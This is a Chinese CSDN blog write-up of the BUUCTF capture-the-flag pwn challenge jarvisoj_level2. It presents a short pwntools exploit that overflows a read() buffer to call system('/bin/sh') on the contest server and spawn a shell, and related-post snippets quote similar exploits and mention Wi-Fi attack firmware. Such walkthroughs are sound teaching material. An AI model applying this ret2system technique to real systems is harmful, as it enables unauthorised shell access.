[BUUCTF-pwn]——jarvisoj_level2

最新推荐文章于 2024-06-23 01:01:15 发布
最新推荐文章于 2024-06-23 01:01:15 发布
阅读量802 收藏 2
点赞数 2
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113784704
版权
该博客介绍了如何利用CTF比赛中的一个32位程序漏洞进行攻击。通过checksec检查,发现程序包含可用于溢出的read函数,并存在system函数和'/bin/sh'字符串。博主给出了exploit代码,利用栈溢出设置system函数地址,执行/bin/sh,从而实现远程连接到目标服务器并获取交互权限。
摘要由CSDN通过智能技术生成

[BUUCTF-pwn]——jarvisoj_level2

checksec 一下下, 32程序
在这里插入图片描述
IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

exploit

from pwn import *
p = remote("node3.buuoj.cn",28375)
binsh = 0x0804A024
sys_addr = 0x0804845C
payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(binsh)
p.sendlineafter("Input:\n",payload)
p.interactive()
Y-peak
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 795
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
jarvisoj_level2题解
OrientalGlass的博客
01-08 232
这题没有现成的system("/bin/sh")可以调用,但是有system函数和/bin/sh字符串。所以可以通过溢出修改返回函数为call system位置,并且将栈顶元素修改为/bin/sh所在地址。这样就可以成功执行system("/bin/sh")2.ida查看,很显然这里有栈溢出。4.寻找system和bin/sh。1.checksec查看。
BUUCTF - PWNjarvisoj_level2
古月浪子的博客
04-05 657
checksec一下,栈溢出 IDA打开看看,很容易找到溢出点,/bin/sh字符串程序里也有现成的 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) ru=lamb...
jarvisoj_level2
最新发布
Nike_name的博客
06-23 344
栈溢出构造(函数)从而得到shell
[BUUCTF]PWN16——jarvisoj_level2
mcmuyanga的博客
09-01 2024
[BUUCTF]PWN16——jarvisoj_level2 附件 步骤 例行检查,32位,开启了nx保护 试运行一下程序 32位ida载入,shift+f12查看一下程序里的字符串,发现了system函数和 /bin/sh 字符串 双击跟进,ctrl+x本想查看调用该字符串的函数的,没有找到,但是程序里有这些字符串的位置, shell_addr=0x804a024 system_addr=0x8048320 我们可以直接利用这些构造 system(/bin/sh)去执行 跟进试运行时候看到的字
BUUCTF jarvisoj_level2
、moddemod
06-12 538
exp from pwn import * context(log_level = 'debug') proc_name = './level2' p = process(proc_name) # p = remote('node3.buuoj.cn', 26643) elf = ELF(proc_name) system_addr = elf.sym['system'] main_addr = elf.sym['main'] bin_sh_str = 0x0804a024 payload = 'a'..
BUUCTF-Pwn-jarvisoj_level2
餐桌上的猫
02-15 2327
题目截图 检查文件信息,开启了NX 用IDA打开查看字符串,存在/bin/sh,检查交叉引用发现并没有被使用 查看函数表存在system函数 进入主函数反汇编查看 进入函数vulnerable_function()查看,发现存在栈溢出漏洞,就可以利用现有system函数和/bin/sh字符串getshell exp from pwn import* r=remote('node4.buuoj.cn',28083) str_bin_sh=0x804a024 call_system=0x8048
CTF buuoj pwn-----第9题:jarvisoj_level2
bing_Max的博客
09-27 761
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
jarvisoj_level2【BUUCTF
qq_41696518的博客
08-26 693
jarvisoj_level2【BUUCTF
[buuctf]jarvisoj_level2
逆向萌新的博客
06-19 490
[buuctf]jarvisoj_level2
[BUUCTF]PWN------jarvisoj_level2
BangSen1的博客
01-20 310
jarvisoj_level2 例行检查,32bit,开启NX保护。 nc 一下 ,Hello world,没什么信息 用32位IDA打开,看到了/bin/sh,跟进一下。 想查看调用函数的,但是看不了,所幸地址已经给出,所以shell_addr=0x804A024 system_addr=0x8048320 直接利用这些构造 system(/bin/sh)去执行 找到输入点 buf的大小是0x88,读入的数据大小是0x100,多余空间足以构造rop exp flag ...
buuctf jarvisoj_level2
carol2358的博客
04-19 286
水题 可以在ida里找到system和/bin/sh(alt+t) 然后构造payload就完事了 from pwn import * from LibcSearcher import * context(log_level = 'debug',arch ='i386',os = 'linux' ) r = remote('node3.buuoj.cn', 28847) #r = proc...
buuctf PWN jarvisoj_level2
wp568的博客
10-06 138
漏洞,buf数组只给了0x88的大小,但是最多可以读入0x100个字节的数据,所以多读入的数据就会向下把栈给覆盖掉。把function函数的返回地址覆盖成system函数的入口地址,然后把参数改成"bin/sh"字符串的地址0x0804A024。地址为:0x0804845C。地址为:0x0804849E。
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值